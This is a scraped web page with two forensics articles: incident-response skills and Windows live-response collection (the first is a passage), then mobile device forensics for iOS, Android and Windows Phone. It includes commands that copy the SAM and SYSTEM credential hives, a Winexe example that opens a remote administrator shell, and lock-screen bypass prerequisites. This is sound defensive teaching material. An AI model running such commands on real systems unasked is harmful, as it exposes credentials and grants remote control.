and technologies that lead to flaws in these protocols, the weaknesses that can be exploited (and why), the types of exploitation methods that would likely be used, and the strategies to mitigate or eliminate these potential problems. They should have expert understanding of additional protocols or Internet technologies (DNSSEC, IPv6, IPSEC, and other telecommunication standards that might be implemented or interface with their constituent's networks, such as ATM, BGP, broadband, voice over IP, wireless technology, other routing protocols, or new emerging technologies, and so on). They could then provide expert technical guidance to other members of the team or constituency. Network applications and services The IR team's staff need a basic understanding of the common network applications and services that the team and the constituency use (DNS, NFS, SSH, and so on). For each application or service they should understand the purpose of the application or service, how it works, its common usages, secure configurations, and the common types of threats or attacks against the application or service, as well as mitigation strategies. Network security issues The members of the IR team should have a basic understanding of the concepts of network security and be able to recognize vulnerable points in network configurations. They should understand the concepts and basic perimeter security of network firewalls (design, packet filtering, proxy systems, DMZ, bastion hosts, and so on), router security, the potential for information disclosure of data traveling across the network (for example, packet monitoring or "sniffers"), or threats that are related to accepting untrustworthy information. Host or system security issues In addition to understanding security issues at a network level, the IR team's members need to understand security issues at a host level for the various types of operating systems (UNIX, Windows, or any other operating systems that are used by the team or constituency). Before understanding the security aspects, the IR team's member must first have the following: Experience using the operating system (user security issues) Some familiarity with managing and maintaining the operating system (as an administrator) Then, for each operating system, the IR team member needs to know how to perform the following: Configure (harden) the system securely Review configuration files for security weaknesses Identify common attack methods Determine whether a compromise attempt occurred Determine whether an attempted system compromise was successful Review log files for anomalies Analyze the results of attacks Manage system privileges Secure network daemons Recover from a compromise Malicious code The IR team's members must understand the different types of malicious code attacks that occur and how these can affect their constituency (system compromises, denial of service, loss of data integrity, and so on). Malicious code can have different types of payloads that can cause a denial of service attack or web defacement, or the code can contain more "dynamic" payloads that can be configured to result in multifaceted attack vectors. Staff should understand not only how malicious code is propagated through some of the obvious methods (disks, e-mail, programs, and so on), but they should also understand how it can propagate through other means, such as PostScript, Word macros, MIME, peer-to-peer file sharing, or boot-sector viruses that affect operating systems running on PC and Macintosh platforms. The IR team's staff must be aware of how such attacks occur and are propagated, the risks and damage associated with such attacks, prevention and mitigation strategies, detection and removal processes, and recovery techniques. Specialist skills include expertise in performing analysis, black box testing, reverse engineering malicious code that is associated with such attacks, and in providing advice to the team on the best approaches for an effective response. Programming skills Some team members need to have system and network programming experience. The team should ensure that a range of programming languages is covered on the operating systems that the team and the constituency use. For example, the team should have experience in the following: C Python Awk Java Shell (all variations) Other scripting tools These scripts or programming tools can be used to assist in the analysis and handling of incident information (for example, writing different scripts to count and sort through various logs, search databases, look up information, extract information from logs or files, and collect and merge data). Incident handling skills Local team policies and protocols Understanding and identifying intruder techniques Communication with sites Incident analysis Maintenance of incident records The hardware for IR and Jump Bag Certainly, a set of equipment that may be required during the processing of the incident should be prepared in advance, and this matter should be given much attention. This set is called the Jump Bag. The formation of such a kit is largely due to the budget the organization could afford. Nevertheless, there is a certain necessary minimum, which will allow the team to handle incidents in small quantities. If the budget allows it, it is possible to buy a turnkey solution, which includes all the necessary equipment and the case for its transportation. As an instance of such a solution, FREDL + Ultra Kit could be recommended. FREDL is short for Forensic Recovery of Evidence Device Laptop. With Ultra Kit, this solution will cost about 5000 USD. Ultra Kit contains a set of write-blockers and a set of adapters and connecters to obtain images of hard drives with a different interface: More details can be found on the manufacturer's website at https://www.digitalintelligence.com/products/ultrakit/. Certainly, if we ignore the main drawback of such a solution, this decision has a lot of advantages as compared to the cost. Besides this, you get a complete starter kit to handle the incident. Besides, Ultra Kit allows you to safely transport equipment without fear of damage. The FRED-L laptop is based on a modern hardware, and the specifications are constantly updated to meet modern requirements. Current specifications can be found on the manufacturer's website at http://www.digitalintelligence.com/products/fredl/. However, if you want to replace the expensive solution, you could build a cheaper alternative that will save 20-30% of the budget. It is possible to buy the components included in the review of decisions separately. As a workstation, you can choose a laptop with the following specifications: Intel Core i7-6700K Skylake Quad Core Processor, 4.0 GHz, 8MB Intel Smart Cache 16 GB PC4-17000 DDR4 2133 Memory 256 GB Solid State Internal SATA Drive Intel Z170 Express Chipset NVIDIA GeForce GTX 970M with 6 GB GDDR5 VRAM This specification will provide a comfortable workstation to work on the road. As a case study for the transport of the equipment, we recommend paying attention to Pelican (http://www.pelican.com) cases. In this case, the manufacturer can choose the equipment to meet your needs. One of the typical tasks in handling of incidents is obtaining images from hard drives. For this task, you can use a duplicator or a bunch of write-blockers and computer. Duplicators are certainly a more convenient solution; their usage allows you to quickly get the disk image without using additional software. Their main drawback is the price. However, if you often have to extract the image of hard drives and you have a few thousand dollars, the purchase of the duplicator is a good investment. If the imaging of hard drives is a relatively rare problem and you have a limited budget, you can purchase a write blocker which will cost 300-500 USD. However, it is necessary to use a computer and software. To pick up the necessary equipment, you can visit http://www.insectraforensics.com, where you can find equipment from different manufacturers. Also, do not forget about the hard drives themselves. It is worth buying a few hard drives with large volumes for the possibility of good performance. To summarize, responders need to include the following items in a basic set: Several network cables (straight through or loopback) A serial cable with a serial USB adapter Network serial adapters Hard drives (various sizes) Flash drives A Linux Live DVD A portable drive duplicator with a write-blocker Various drive interface adapters A four port hub A digital camera Cable ties Cable snips Assorted screws and hex drivers Notebooks and pens Chain of Custody forms Incident handling procedure Software After talking about the hardware, we did not forget about the software that you should always have on hand. The variety of software that can be used in the processing of the incident allows you to select software-based preferences, skills, and budget. Some prefer command-line utilities, and some find that GUI is more convenient to use. Sometimes, the use of certain tools is dictated by the circumstances under which it's needed to work. We strongly recommend that you prepare these in advance and thoroughly test the entire set of required software. Live versus mortem The initial reaction to an incident is a very important step in the process of computer incident management. The correct method of carrying out and performing this step depends on the success of the investigation. Moreover, a correct and timely response is needed to reduce the damage caused by the incident. The traditional approach to the analysis of the disks is not always practical, and in some cases, it is simply not possible. In today's world, the development of computer technology has led to many companies having a distribution network in many cities, countries, and continents. Wish this physical disconnection of the computer from the network, following the traditional investigation of each computer is not possible. In such cases, the incident responder should be able to carry out a prior assessment remotely and as soon as possible, view a list of running processes, open network connections, open files, and get a list of registered users in the system. Then, if necessary, carry out a full investigation. In this article, we will look at some approaches that the responder may apply in a given situation. However, even in these cases when we have physical access to the machine, live response is the only way of incident response. For example, cases where we are dealing with large disk arrays. In this case, there are several problems at once. The first problem is that the space to store large amounts of data is also difficult to identify. In addition to this, the time that may be required to analyze large amounts of data is unreasonably high. Typically, such large volumes of data have a highly loaded server serving hundreds of thousands of users, so their trip, or even a reboot, is not acceptable for business. Another scenario that requires the Live Forensics approach is when an encrypted filesystem is used. In cases where the analyst doesn't have the key to decrypt the disc, Live Forensics is a good alternative to obtain data from a system where encryption of the filesystem is used. This is not an exhaustive list of cases when the Live Analysis could be applicable. It is worth noting one very important point. During the Live Analysis, it is not possible to avoid changes in the system. Connecting external USB devices or network connectivity, user log on, or launching an executable file will be modified in the system in a variety of log files, registry keys, and so on. Therefore, you need to understand what changes were caused by the actions of responders and document them. Volatile data Under the principle of "order of Volatility", you must first collect information that is classified as Volatile Data (the list of network connections, the list of running processes, log on sessions, and so on), which will be irretrievably lost in case the computer is powered off. Then, you can start to collect nonvolatile data, which can also be obtained with the traditional approach in the analysis of the disk image. The main difference in this case is that a Live Forensics set of data is easier to obtain with a working machine. This article will focus on the collection of Volatile data. Typically, this category includes the following data: System uptime and the current time Network parameters (NetBIOS name cache, active connections, the routing table, and so on). NIC configuration settings Logged on users and active sessions Loaded drivers Running services Running processes and their related parameters (loaded DLLs, open handles, and ownership) Autostart modules Shared drives and files opened remotely Recording the time and date of the data collection allows you to define a time interval in which the investigator will perform an analysis of the system: (date / t) & (time / t)>%COMPUTER_NAME% systime.txt systeminfo | find "Boot Time" >>% COMPUTERNAME% systime.txt The last command allows you to< show how long the machine worked since the last reboot. Using the %COMPUTERNAME% environment variable, we can set up separate directories for each machine in case we need to repeat the process of collecting information on different computers in a network. In some cases, signs of compromise are clearly visible in the analysis of network activity. The next set of commands allows you to get this information: nbtstat -c> %COMPUTERNAME%NetNameCache.txt netstat -a -n -o>%COMPUTERNAME%NetStat.txt netstat -rn>%COMPUTNAME%NetRoute.txt ipconfig / all>%COMPUTERNAME%NIC.txt promqry>%COMPUTERNAME%NSniff.txt The first command uses nbtstat.exe to obtain information from the cache of NetBIOS. You display the NetBIOS names in their corresponding IP address. The second and third commands use netstat.exe to record all of the active compounds, listening ports, and routing tables. For information about network settings, the ipconfig.exe network interfaces command is used. The last block command starts the Microsoft promqry utility, which allows you to define the network interfaces on the local machine, which operates in promiscuous mode. This mode is required for network sniffers, so the detection of the regime indicates that the computer can run software that listens to network traffic. To enumerate all the logged on users on the computer, you can use the Sysinternals tools: psloggedon -x>%COMPUTERNAME% LoggedUsers.tx: logonsessions -p >> %COMPUTERNAME%LoggedOnUsers.txt The PsLoggedOn.exe command lists both types of users, those who are logged on to the computer locally, and those who logged on remotely over the network. Using the -x switch, you can get the time at which each user logged on. With the -p key, logonsessions will display all of the processes that were started by the user during the session. It should be noted that logonsessions must be run with administrator privileges. To get a list of all drivers that are loaded into the system, you can use the WDK drivers.exe utility: drivers.exe>%COMPUTERNAME%drivers.txt The next set of commands to obtain a list of running processes and related information is as follows: tasklist / svc>%COMPUTERNAME% taskdserv.txt psservice>%COMPUTERNAME% trasklst.txt tasklist / v>%COMPUTERNAME% taskuserinfo.txt pslist / t>%COMPUTERNAME%tasktree.txt listdlls>%COMPUTERNAME%lstdlls.txt handle -a>%COMPUTERNAME%lsthandles.txt The tasklist.exe utility that is made with the / svc key enumerates the list of running processes and services in their context. While the previous command displays a list of running services, PsService receives information on services using the information in the registry and SCM database. Services are a traditional way through which attackers can access a previously compromised system. Services can be configured to run automatically without user intervention, and they can be launched as part of another process, such as svchost.exe. In addition to this, remote access can be provided through completely legitimate services, such as telnet or ftp. To associate users with their running processes, use the tasklist / v command key. To enumerate a list of DLLs loaded in each process and the full path to the DLL, you can use listsdlls.exe from SysInternals. Another handle.exe utility can be used to list all the handles, which are open processes. This handles registry keys, files, ports, mutexes, and so on. Other utilities require run with administrator privileges. These tools can help identify malicious DLLs that were injected into the processes, as well as files, which have not been accessed by these processes. The next group of commands allows you to get a list of programs that are configured to start automatically: autorunsc.exe -a>%COMPUTERNAME% autoruns.txt at>%COMPUTERNAME% at.txt schtasks / query>%COMPUTERNAME% schtask.txt The first command starts the SysInternals utility, autoruns, and displays a list of executables that run at system startup and when users log on. This utility allows you to detect malware that uses the popular and well-known methods for persistent installation into the system. Two other commands (at and schtasks) display a list of commands that run in the schedule. To start the at command also requires administrator privileges. To install backdoors mechanisms, services are often used, but services are constantly working in the system and, thus, can be easily detected during live response. Thus, create a backdoor that runs on a schedule to avoid detection. For example, an attacker could create a task that will run the malware just outside working hours. To get a list of network share drives and disk files that are deleted, you can use the following two commands: psfile>%COMPUTERNAME%openfileremote.txt net share>%COMPUTERNAME%drives.txt Nonvolatile data After Volatile data has been collected, you can continue to collect Nonvolatile Data. This data can be obtained at the stage of analyzing the disk, but as we mentioned earlier, analysis of the disk is not possible in some cases. This data includes the following: The list of installed software and updates User info Metadata about a filesystem's timestamps Registry data However, upon receipt of this data with the live running of the system, there are difficulties that are associated with the fact that many of these files cannot be copied in the usual way, as they are locked by the operating system. To do this, use one of the utilities. One such utility is the RawCopy.exe utility, which is authored by Joakim Schicht. This is a console application that copies files off NTFS volumes using the low-level disk reading method. The application has two mandatory parameters, target file and output path: -param1: This is the full path to the target file to extract; it also supports IndexNumber instead of file path -param2: This is a valid path to output directory This tool will let you copy files that are usually not accessible because the system has locked them. For instance, the registry hives such as SYSTEM and SAM, files inside SYSTEM VOLUME INFORMATION, or any file on the volume. This supports the input file specified either with the full file path or by its $MFT record number (index number). Here's an example of copying the SYSTEM hive off a running system: RawCopy.exe C:WINDOWSsystem32configSYSTEM %COMPUTERNAME%SYSTEM Here's an example of extracting the $MFT by specifying its index number: RawCopy.exe C:0 %COMPUTERNAME%mft Here's an example of extracting the MFT reference number 30224 and all attributes, including $DATA, and dumping it into C:tmp: RawCopy.exe C:30224 C:tmp -AllAttr To download RawCopy, go to https://github.com/jschicht/RawCopy. Knowing what software is installed and what its updates are helps further the investigation because this shows possible ways to compromise a system through a vulnerability in the software. One of the first actions that the attacker makes is to attack during a system scan to detect active services and exploit the vulnerabilities in them. Thus, services that were not patched can be utilized for remote system penetration. One way to install a set of software and updates is to use the systeminfo utility: systeminfo > %COMPUTERNAME%sysinfo.txt. Moreover, skilled attackers can themselves perform the same actions and install necessary updates in order to hide the traces of penetration into the system. After identifying the vulnerable services and their successful exploits, the attacker creates an account for themselves in order to subsequently use legal ways to enter the system. Therefore, the analysis of data about users of the system reveals the following traces of the compromise: The Recent folder contents, including LNK files and jump lists LNK files in the Office Recent folder The Network Recent folder contents The entire temp folder The entire Temporary Internet Files folder The PrivacyIE folder The Cookies folder The Java Cache folder contents Now, let's consider the preceding cases as follows: Collecting the Recent folder is done as follows: robocopy.exe %RECENT% %COMPUTERNAME%Recent /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%Recent log.txt Here %RECENT% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %RECENT% = %systemdrive%Documents and Settings%USERNAME%Recent For Windows 6.x (Windows Vista and newer): %RECENT% =%systemdrive%Users%USERNAME%AppDataRoaming MicrosoftWindowsRecent Collecting the Office Recent folder is done as follows: robocopy.exe %RECENT_OFFICE% %COMPUTERNAME%Recent_Office /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%Recent_Officelog.txt Here %RECENT_OFFICE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %RECENT_OFFICE% = %systemdrive%Documents and Settings%USERNAME%Application DataMicrosoftOffice Recent For Windows 6.x (Windows Vista and newer), this is as follows: %RECENT% =%systemdrive%Users%USERNAME%AppDataRoaming MicrosoftWindowsOfficeRecent Collecting the Network Shares Recent folder is done as follows: robocopy.exe %NetShares% %COMPUTERNAME%NetShares /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%NetShareslog.txt Here %NetShares% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %NetShares% = %systemdrive%Documents andSettings%USERNAME%Nethood For Windows 6.x (Windows Vista and newer), this is as follows: %NetShares % =''%systemdrive%Users%USERNAME%AppData RoamingMicrosoftWindowsNetwork Shortcuts'' Collecting the Temporary folder is done as follows: robocopy.exe %TEMP% %COMPUTERNAME%TEMP /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%TEMPlog.txt Here %TEMP% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %TEMP% = %systemdrive%Documents and Settings%USERNAME% Local SettingsTemp For Windows 6.x (Windows Vista and newer), this is as follows: %TEMP% =''%systemdrive%Users%USERNAME%AppData LocalTemp '' Collecting the Temporary Internet Files folder is done as follows: robocopy.exe %TEMP_INTERNET_FILES% %COMPUTERNAME%TEMP_INTERNET_FILES /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%TEMPlog.txt Here %TEMP_INTERNET_FILE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %TEMP_INTERNET_FILE% = ''%systemdrive%Documents and Settings%USERNAME%Local SettingsTemporary Internet Files'' For Windows 6.x (Windows Vista and newer), this is as follows: %TEMP_INTERNET_FILE% =''%systemdrive%Users%USERNAME% AppDataLocalMicrosoftWindowsTemporary Internet Files" Collecting the PrivacIE folder is done as follows: robocopy.exe %PRIVACYIE % %COMPUTERNAME%PrivacyIE /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%/PrivacyIE/log.txt Here %PRIVACYIE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %PRIVACYIE% = ''%systemdrive%Documents andSettings%USERNAME% PrivacIE'' For Windows 6.x (Windows Vista and newer), this is as follows: %PRIVACYIE% =''%systemdrive%Users%USERNAME% AppDataRoamingMicrosoftWindowsPrivacIE " Collecting the Cookies folder is done as follows: robocopy.exe %COOKIES% %COMPUTERNAME%Cookies /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%Cookies .txt Here %COOKIES% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %COOKIES% = ''%systemdrive%Documents and Settings%USERNAME%Cookies'' For Windows 6.x (Windows Vista and newer), this is as follows: %COOKIES% =''%systemdrive%Users%USERNAME% AppDataRoamingMicrosoftWindowsCookies" Collecting the Java Cache folder is done as follows: robocopy.exe %JAVACACHE% %COMPUTERNAME%JAVACACHE /ZB /copy:DAT /r:0 /ts /FP /np /E log:%COMPUTERNAME%JAVACAHElog.txt Here %JAVACACHE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows: %JAVACACHE% = ''%systemdrive%Documents and Settings%USERNAME%Application DataSunJavaDeployment cache'' For Windows 6.x (Windows Vista and newer), this is as follows: %JAVACACHE% =''%systemdrive%Users%USERNAME%AppData LocalLowSunJavaDeploymentcache" Remote live response However, as mentioned earlier, it is often necessary to carry out the collection of information remotely. On Windows systems, this is often done using the SysInternals PsExec utility. PsExec lets you execute commands on remote computers and does not require the installation of the system. How the program works is a psexec.exe resource executable is another PsExecs executable. This file runs the Windows service on a particular target machine. Before executing the command, PsExec unpacks this hidden resource in the administrative sphere of the remote computer at Admin$ (C:Windows) file Admin$system32psexecsvc.exe. After copying this, PsExec installs and runs the service using the API functions of the Windows management services. Then, after starting psexesvc, a data connection (input commands and getting results) between psexesvc and psexec is established. Upon completion of the work, psexec stops the service and removes it from the target computer. If the remote collection of information is necessary, a working machine running UNIX OS can use the Winexe utility. Winexe is a GNU/Linux-based application that allows users to execute commands remotely on WindowsNT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most of the Windows shell commands: winexe -U [Domain/]User%Password //host command To launch a Windows shell from inside your Linux system, use the following command: winexe -U HOME/Administrator%Pass123 //192.168.0.1 "cmd.exe" Summary In this article, we discussed what we should have in the Jump Bag to handle a computer incident, and what kind of skills the members of the IR team require. Also, we took a look at live response and collected Volatile and Nonvolatile information from a live system. We also discussed different tools to collect information. We also discussed when we should to use a live response approach as an alternative to traditional forensics. Resources for Article: Further resources on this subject: BackTrack Forensics [article] Mobile Phone Forensics – A First Step into Android Forensics [article] Forensics Recovery [article]
Read more
  • 0
  • 0
  • 5079

article-image-mobile-forensics
Packt
24 May 2016
15 min read
Save for later

Mobile Forensics

Packt
24 May 2016
15 min read
In this article by Soufiane Tahiri, the author of Mastering Mobile Forensics, we will look at the basics of smartphone forensics. Smartphone forensic is a relatively new and quickly emerging field of interest within the digital forensic community and law enforcement, as today's mobile devices are getting smarter, cheaper, and more easily available for common daily use. (For more resources related to this topic, see here.) To investigate the growing number of digital crimes and complaints, researchers have put in a lot of efforts to design the most affordable investigative model; in this article, we will emphasize the importance of paying real attention to the growing market of smartphones and the efforts made in this field from a digital forensic point of view, in order to design the most comprehensive investigation process. Smartphone forensics models Given the pace at which mobile technology grows and the variety of complexities that are produced by today's mobile data, forensics examiners face serious adaptation problems; so, developing and adopting standards makes sense. Reliability of evidence depends directly on adopted investigative processes, choosing to bypass or bypassing a step accidentally may (and will certainly) lead to incomplete evidence and increase the risk of rejection in the court of law. Today, there is no standard or unified model that is adapted to acquiring evidences from smartphones. The dramatic development of smart devices suggests that any forensic examiner will have to apply as many independent models as necessary in order to collect and preserve data. Similar to any forensic investigation, several approaches and techniques can be used to acquire, examine, and analyze data from a mobile device. This section provides a proposed process in which guidelines from different standards and models (SWGDE Best Practices for Mobile Phone Forensics, NIST Guidelines on Mobile Device Forensics, and Developing Process for Mobile Device Forensics by Det. Cynthia A. Murphy) were summarized. The following flowchart schematizes the overall process: Evidence Intake: This triggers the examination process. This step should be documented. Identification: In this, the examiner needs to identify the device's capabilities and specifications. The examiner should document everything that takes place during the whole process of identification. Preparation: In this, the examiner should prepare tools and methods to use and must document them. Securing and preserving evidences: In this, the examiner should protect the evidences and secure the scene, as well as isolate the device from all networks. The examiner needs to be vigilant when documenting the scene. Processing: At this stage, the examiner starts performing the actual (and technical) data acquisition, analysis, and documents the steps, and tools used and all his findings. Verification and validation: The examiner should be sure of the integrity of his findings and he must validate acquired data and evidences in this step. This step should be documented as well. Reporting: The examiner produces a final report in which he documents process and finding. Presentation: This stage is meant to exhibit and present the findings. Archiving: At the end of the forensic process, the examiner should preserve data, report, tools, and all his finding in common formats for an eventual use. Low-level techniques Digital forensic examiners can neither always nor exclusively rely on commercially available tools, handling low-level techniques is a must. This section will also cover the techniques of extracting strings from different object (for example, smartphone images) Any digital examiner should be familiar with concepts and techniques, such as: File carving: This is defined as the process of extracting a collection of data from a larger data set. It is applied to a digital investigation case. File carving is the process of extracting "data" from unallocated filesystem space using file type inner structure and not filesystem structure, meaning that the extraction process is principally based on file types headers and trailers. Extracting metadata: In an ambiguous way metadata is data that describes data or information about information. In general, metadata is hidden and extra information is generated and embedded automatically in a digital file. The definition of metadata differs depending on the context in which it's used and the community that refers to it; metadata can be considered as machine understandable information or record that describes digital records. In fact, metadata can be subdivided into three important types: Descriptive (including elements, such as author, title, abstract, keywords, and so on), Structural (describing how an object is constituted and how the elements are arranged) and Administrative (including elements, such as date and time of creation, data type, and other technical details) String dump and analysis: Most of the digital investigations rely on textual evidences, this is obviously due to the fact that most of the stored digital data is linguistic; for instance, logged conversation, a lot of important text based evidence can be gathered while dumping strings from images (smartphone memory dumps) and can include emails, instant messaging, address books, browsing history, and so on. Most of the currently available digital forensic tools rely on matching and indexing algorithms to search textual evidence at physical level, so that they search every byte to locate specific text strings. Encryption versus encoding versus hashing: The important thing to keep in mind is that encoding, encrypting and hashing are the terms that do not say the same thing at all: Encoding: Is meant for data usability, and it can be reversed using the same algorithm and requires no key Encrypting: Is meant for confidentiality, is reversible and depending on algorithms, it relies on key(s) to encrypt and decrypt. Hashing: Is meant for data integrity and cannot be 'theoretically' reversible and depends on no keys. Decompiling and disassembling: These are types of reverse engineering processes that do the opposite of what a compiler and an assembler do. Decompiler: This translates a compiled binary's low-level code designed to be computer readable into human readable high-level code. The accuracy of decompilers depends on many factors, such as the amount of metadata present in the code being decompiled and the complexity of the code (not in term of algorithms but in term of the high-level code used sophistication). Disassembler: The output of a disassembler is at some level dependent on the processor. It maps processor instructions into mnemonics, which is in contrast to decompiler's output that is far more complicated to understand and edit. iDevices forensics Similar to all Apple operating systems, iOS is derived from Mac OS X; thus, iOS uses Hierarchical File System Plus (HFS+) as its primary file system. HFS+ replaces the first developed filesystem HFS and is considered to be an enhanced version of HFS, but they are still architecturally very similar. The main improvements seen in HFS+ are: A decrease in disk space usage on large volumes (efficient use of disk space) Internationally-friendly file names (by the use of UNICODE instead of MacRoman) Allows future systems to use and extend files/folder's metadata HFS+ divides the total space on a volume (file that contains data and structure to access this data) into allocation blocks and uses 32-bit fields to identify them, meaning that this allows up to 2^32 blocks on a given volume which "simply" means that a volume can hold more files. All HFS+ volumes respect a well-defined structure and each volume contains a volume header, a catalog file, extents overflow file, attributes file, allocation file, and startup file. In addition, all Apple' iDevices have a combined built-in hardware/software advanced security and can be categorized according to Apple's official iOS Security Guide as: System security: Integrated software and hardware platform Encryption and data protection: Mechanisms implemented to protect data from unauthorized use Application security: Application sandboxing Network security: Secure data transmission Apple Pay: Implementation of secure payments Internet services: Apple's network of messaging, synchronizing, and backuping Device controls: Remotely wiping the device if it is lost or stolen Privacy control: Capabilities of control access to geolocation and user data When dealing with seizure, it's important to turn on Airplane mode and if the device is unlocked, set auto-lock to never and check whether passcode was set or not (Settings | Passcode). If you are dealing with a passcode, try to keep the phone charged if you cannot acquire its content immediately; if no passcode was set, turn off the device. There are four different acquisition methods when talking about iDevices: Normal or Direct, this is the most perfect case where you can deal directly with a powered on device; Logical Acquisition, when acquisition is done using iTunes backup or a forensic tool that uses AFC protocol and is in general not complete when emails, geolocation database, apps cache folder, and executables are missed; Advanced Logical Acquisition, a technique introduced by Jonathan Zdziarski (http://www.zdziarski.com/blog/) but no longer possible due to the introduction of iOS 8; and Physical Acquisition that generates a forensic bit-by-bit image of both system and data partitions. Before selecting (or not, because the method to choose depends on some parameters) one method, the examiner should answer three important questions: What is the device model? What is the iOS version installed? Is the device passcode protected? Is it a simple passcode? Is it a complex passcode? Android forensics Android is an open source Linux based operating system, it was first developed by Android Inc. in 2003; then in 2005 it was acquired by Google and was unveiled in 2007. The Android operating system is like most of operating systems; it consists of a stack of software components roughly divided into four main layers and five main sections, as shown on the image from https://upload.wikimedia.org/wikipedia/commons/a/af/Android-System-Architecture.svg) and each layer provides different services to the layer above. Understanding every smartphone's OS security model is a big deal in a forensic context, all vendors and smartphones manufacturers care about securing their user's data and in most of the cases the security model implemented can cause a real headache to every forensic examiner and Android is no exception to the rule. Android, as you know, is an open source OS built on the Linux Kernel and provides an environment offering the ability to run multiple applications simultaneously, each application is digitally signed and isolated in its very own sandbox. Each application sandbox defines the application's privileges. Above the Kernel all activities have constrained access to the system. Android OS implements many security components and has many considerations of its various layers; the following figure summarizes Android security architecture on ARM with TrustZone support: Without any doubt, lock screens represent the very first starting point in every mobile forensic examination. As for all smartphone's OS, Android offers a way to control access to a given device by requiring user authentication. The problem with recent implementations of lock screen in modern operating systems in general, and in Android since it is the point of interest of this section, is that beyond controlling access to the system user interface and applications, the lock screens have now been extended with more "fancy" features (showing widgets, switching users in multi-users devices, and so on) and more forensically challenging features, such as unlocking the system keystore to derive the key-encryption key (used among the disk encryption key) as well as the credential storage encryption key. The problem with bypassing lock screens (also called keyguards) is that techniques that can be used are very version/device dependent, thus there is neither a generalized method nor all-time working techniques. Android keyguard is basically an Android application whose window lives on a high window layer with the possibility of intercepting navigation buttons, in order to produce the lock effect. Each unlock method (PIN, password, pattern and face unlock) is a view component implementation hosted by the KeyguardHostView view container class. All of the methods/modes, used to secure an android device, are activated by setting the current selected mode in the enumerable SecurityMode of the class KeyguardSecurityModel. The following is the KeyguardSecurityModel.SecurityModeimplementation, as seen from Android open source project:     enum SecurityMode {         Invalid, // NULL state         None, // No security enabled         Pattern, // Unlock by drawing a pattern.         Password, // Unlock by entering an alphanumeric password         PIN, // Strictly numeric password         Biometric, // Unlock with a biometric key (e.g. finger print or face unlock)         Account, // Unlock by entering an account's login and password.         SimPin, // Unlock by entering a sim pin.         SimPuk // Unlock by entering a sim puk     } Before starting our bypass and locks cracking techniques, dealing with system files or "system protected files" assumes that the device you are handling meets some requirements: Using Android Debug Bridge (ADB) The device must be rooted USB Debugging should be enabled on the device Booting into a custom recovery mode JTAG/chip-off to acquire a physical bit-by-bit copy Windows Phone forensics Based on Windows NT Kernel, Windows Phone 8.x uses the Core System to boot, manage hardware, authenticate, and communicate on networks. The Core System is a minimal Windows system that contains low-level security features and is supplemented by a set of Windows Phone specific binaries from Mobile Core to handle phone-specific tasks which make it the only distinct architectural entity (From desktop based Windows) in Windows Phone. Windows and Windows Phone are completely aligned at Window Core System and are running exactly the same code at this level. The shared core actually consists of the Windows Core System and Mobile Core where APIs are the same but the code behinds is turned to mobile needs. Similar to most of the mobile operating systems, Windows Phone has a pretty layered architecture; the kernel and OS layers are mainly provided and supported by Microsoft but some layers are provided by Microsoft's partners depending on hardware properties in the form of board support package (BSP), which usually consists of a set of drivers and support libraries that ensure low-level hardware interaction and boot process created by the CPU supplier, then comes the original equipment manufacturers (OEMs) and independent hardware vendors (IHVs) that write the required drivers to support the phone hardware and specific component. Following this is a high level diagram describing Windows Phone architecture organized by layer and ownership: There are three main partitions on a Windows Phone that are forensically interesting: MainOS, Data, and Removable User Data (not visible on the preceding screenshot since Lumia 920 does not support SD cards) partitions; as their respective names suggest, the MainOS partition contains all Windows Phone operating system components, Data partition stores all user's data, third-party applications and all application's states. The Removable User Data partition is considered by Windows Phone as a separate volume and refers to all data stored in the SD Card (on devices that supports SD cards). Each of the previously named partitions respects a folder layout and can be mapped to their root folders with predefined Access Control Lists (ACL). Each ACL is in the form of a list of access control entries (ACE) and each ACE identifies the user account to which it applies (trustee) and specifies the access right allowed, denied or audited for that trustee. Windows Phone 8.1 is an extremely challenging and different; forensic tools and techniques should be used in order to gather evidences. One of the interesting techniques is side loading, where an agent to extract contacts and appointments from a WP8.1 device. To extract phonebook and appointments entries we will use WP Logical, which is a contacts and appointments acquisition tool designed to run under Windows Phone 8.1, once deployed and executed will create a folder with the name WPLogical_MDY__HMMSS_PM/AM under the public folder PhonePictures where M=Month, D=Day, Y=Year, H=hour, MM=Minutes and SS= Seconds of the extraction date. Inside the created folder you can find appointments__MDY__HMMSS_PM/AM.html and contacts_MDY__HMMSS_PM/AM.html. WP Logical will extract the following information (if found) regarding each appointment starting from 01/01/CurrentYear at 00:00:00 to 31/12/CurrentYear at 00:00:00: Subject Location Organizer Invitees Start time (UTC) Original start time Duration (in hours) Sensitivity Replay time Is organized by user? Is canceled? More details And the following information about each found contact: Display name First name Middle name Last name Phones (types: personal, office, home, and numbers) Important dates Emails (types: personal, office, home, and numbers) Websites Job info Addresses Notes Thumbnail WP Logical also allows the extraction of some device related information, such as Phone time zone, device's friendly name, Store Keeping Unit (SKU), and so on. Windows Phone 8.1 is relatively strict regarding application deployment; WP Logical can be deployed in two ways: Upload the compiled agent to Windows Store and get it signed by Microsoft, after that it will be available in the store for download. Deploy the agent directly to a developer unlocked device using Windows Phone Application Deployment utility. Summary In this article, we looked at forensics for iOS and Android devices. We also looked at some low-level forensic techniques. Resources for Article: Further resources on this subject: Mobile Forensics and Its Challanges [article] Introduction to Mobile Forensics [article] Forensics Recovery [article]
Read more
  • 0
  • 0
  • 5293

article-image-python-scripting-essentials
Packt
17 May 2016
15 min read
Save for later

